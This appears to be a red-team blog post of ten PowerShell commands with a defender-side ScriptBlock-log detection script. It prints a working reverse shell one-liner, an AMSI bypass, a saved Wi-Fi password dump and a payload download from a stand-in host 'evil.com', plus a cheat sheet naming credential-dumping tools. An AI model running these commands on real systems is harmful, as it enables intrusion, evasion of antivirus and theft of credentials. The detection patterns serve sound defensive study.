⚔️ Top 10 PowerShell Commands Every Red Teamer Should Know (2025 Edition)
“Attackers don’t bring malware; they bring PowerShell.” – Every SOC Analyst Ever
PowerShell has become a critical weapon in a red teamer's arsenal. Native to Windows, stealthy, and powerful, it’s the perfect post-exploitation and recon tool. In this blog, we’ll cover 10 practical PowerShell commands, what they do, and when/how to use them effectively in red team operations or adversary emulation.
🔍 1. System Info Discovery
Get-ComputerInfo | Select-Object CsName, WindowsVersion, OsName, OsArchitecture
This command fetches essential target system info – great for situational awareness once you have code execution.
🕸️ 2. Network Recon
Get-NetTCPConnection | Group-Object State
Shows all active TCP connections and their states. Helps identify open ports, listeners, or suspicious persistence.
👥 3. Enumerate Domain Users
Get-ADUser -Filter * | Select-Object Name,SamAccountName,Enabled
Pulls all domain users from AD (requires the ActiveDirectory module from RSAT, or an AD PowerShell shell). Helps find high-value targets.
💡 Tip: Use this after pivoting into a domain-joined machine.
🔑 4. Extract Saved Wi-Fi Passwords
(netsh wlan show profiles) |
Select-String 'All User Profile' |   # keep only the profile-name lines (text is localized on non-English Windows)
ForEach-Object {
    $name = ($_ -split ':')[1].Trim()          # don't reuse the automatic $profile variable
    netsh wlan show profile name="$name" key=clear   # quote the name in case it contains spaces
}
Grabs saved wireless network passwords—useful for lateral movement in hybrid environments.
🎣 5. Invoke-WebRequest for Payload Delivery
Invoke-WebRequest -Uri http://evil.com/payload.exe -OutFile payload.exe
Downloads files from remote servers. Useful in post-exploitation to pull second-stage malware or tools.
🔁 6. Reverse Shell One-Liner
powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"
This is a weaponized reverse shell payload in one line. Use wisely in labs or approved test environments.
🦠 7. Bypass AMSI (Antimalware Scan Interface)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Bypasses Windows Defender AMSI, allowing potentially malicious scripts to run undetected (until caught 😈).
⚠️ Ethical use only – don’t misuse this.
🗂️ 8. Enumerate All Running Processes
Get-Process | Sort-Object CPU -Descending | Select-Object -First 10
Useful to identify high CPU processes (possibly AV or forensic tools) or background services of interest.
🔐 9. List All Services (Check for Misconfig)
Get-Service | Where-Object {$_.Status -eq "Running"} | Select-Object Name, DisplayName, Status
Use this list as a starting point for finding misconfigured or vulnerable services (for example, weak service ACLs) that could allow service hijacking.
📜 10. ScriptBlock Logging & Security Checks
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational"
Use this to check whether your commands are being logged. Defensive testing is just as important as offense.
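As an added example for this section (not from the original post): a small defender-side script that reads ScriptBlock logging events (ID 4104) from the same log and flags the tradecraft shown in sections 4 to 7. The pattern list and function names are my own, and ScriptBlock logging must be enabled on the host for any events to exist.

```powershell
# Patterns taken from the commands above; tune for your environment.
$SuspiciousPatterns = @(
    'AmsiUtils',                    # AMSI bypass (section 7)
    'amsiInitFailed',
    'Net\.Sockets\.TCPClient',      # socket-based reverse shell (section 6)
    'iex\s|Invoke-Expression',      # inline execution of received text
    'key=clear',                    # Wi-Fi profile password dump (section 4)
    'Invoke-WebRequest.*-OutFile',  # payload download to disk (section 5)
    '-w(indowstyle)?\s+hidden'      # hidden window launch
)

function Test-ScriptBlockText {
    param([Parameter(Mandatory)][string]$Text)
    # Returns the patterns that matched; -match is case-insensitive by default
    $SuspiciousPatterns | Where-Object { $Text -match $_ }
}

function Get-SuspiciousScriptBlocks {
    param([int]$MaxEvents = 500)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # 4104 payload order: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path.
            # Large scripts are split across several events (MessageNumber/MessageTotal),
            # so a pattern can land in any fragment; each fragment is checked on its own.
            $script = $_.Properties[2].Value
            if (-not $script) { return }
            $hits = Test-ScriptBlockText -Text $script
            if ($hits) {
                [pscustomobject]@{
                    TimeCreated   = $_.TimeCreated
                    ScriptBlockId = $_.Properties[3].Value
                    Matched       = ($hits -join ', ')
                    Snippet       = $script.Substring(0, [Math]::Min(120, $script.Length))
                }
            }
        }
}

# Offline check against a constructed sample built from section 7's one-liner
$sample = "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static')"
Test-ScriptBlockText -Text $sample        # AmsiUtils, amsiInitFailed

# Live check against the local log (empty output if logging is off or nothing matched)
Get-SuspiciousScriptBlocks | Format-Table -AutoSize
```

Because 4104 records the de-obfuscated script block as PowerShell compiles it, the check still fires on what actually ran even when the text on the command line was encoded or obfuscated.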
🧠 Final Thoughts
PowerShell is native, powerful, and deadly in the wrong hands. Understanding its full capabilities lets you better emulate advanced adversaries—and also defend against them.
✅ Learn. Practice. Simulate.
Train in safe environments like:
📚 Bonus: PowerShell Red Team Cheat Sheet
| Category | Command Example |
|---|---|
| Recon | systeminfo, ipconfig /all |
| User enum | net user, Get-LocalUser |
| Credential dump | mimikatz, Get-ADReplAccount |
| File transfer | Invoke-WebRequest, CertUtil |
| Shells | powershell reverse shell, nishang |
| AV Evasion | AMSI bypass, obfuscation |